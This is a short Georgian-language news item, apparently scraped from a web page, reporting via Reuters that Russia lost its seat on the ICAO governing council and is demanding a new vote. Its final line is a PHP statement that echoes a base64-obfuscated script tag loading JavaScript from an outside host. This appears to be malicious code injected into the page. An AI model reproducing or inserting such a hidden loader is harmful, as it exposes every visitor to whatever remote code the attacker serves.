celsiusi
ავერსი საქკაბელი
რუსეთმა სამოქალაქო ავიაციის საერთაშორისო ორგანიზაციის [ICAO] მმართველ საბჭოში ადგილი დაკარგა, - ამის შესახებ ინფორმაციას Reuters ავრცელებს. გამოცემის ცნობით, რუსეთმა მმართველ საბჭოში ხელახლა ასარჩევად საკმარისი ხმები ვერ მიიღო.
 
რუსეთი კი პროცედურულ გადახედვას და ახალ კენჭისყრას მოითხოვს.
 
"ჩვენ ამას განვიხილავთ, როგორც წმინდა პოლიტიკურ ნაბიჯს, რომელსაც არავითარი კავშირი არ აქვს რუსეთის პოზიციასთან სამოქალაქო ავიაციის სფეროში", - ამბობს რუსეთის წარმომადგენელი
 
ცნობისთვის, ICAO-ს ასამბლეის სხდომა, რომელიც ყოველ სამ წელიწადში ერთხელ იმართება, 7 ოქტომბრამდე გაგრძელდება. 
421
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");